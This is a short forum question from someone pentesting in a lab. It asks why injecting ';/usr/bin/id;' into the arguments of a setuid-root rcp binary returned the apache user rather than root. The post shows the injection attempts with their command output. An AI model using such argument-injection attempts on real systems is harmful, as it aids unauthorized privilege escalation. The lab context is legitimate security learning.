Setuid on rcp not working as expected

While pentesting in a lab, came across an rcp binary with setuid bit which looked like a potential privilege escalation vector.

bash-3.1$   ls -l /usr/bin/rcp -rwsr-xr-x 1 root root 18544 May 18  2007 /usr/bin/rcp 

Following the explanation at https://securiteam.com/exploits/6b00l1p0bc/ , I tried the following:

bash-3.1$   /usr/bin/rcp 'bob bobalina;/usr/bin/id;' 127.0.0.1 uid=48(apache) gid=48(apache) groups=48(apache) bash: 127.0.0.1: command not found 

My understanding is that since rcp is setuid as root, any command executed by it must be run as root. Why am I then seeing the output of /usr/bin/id as apache, which is the user I am running as?

I’m not a great Linux guy so if I’m missing something obvious, please let me know.

I’ve also tried the command injection with backticks, got the same result:

bash-3.1$   /usr/bin/rcp ``bob bobalina;/usr/bin/id;`` 127.0.0.1 uid=48(apache) gid=48(apache) groups=48(apache) bash: 127.0.0.1: command not found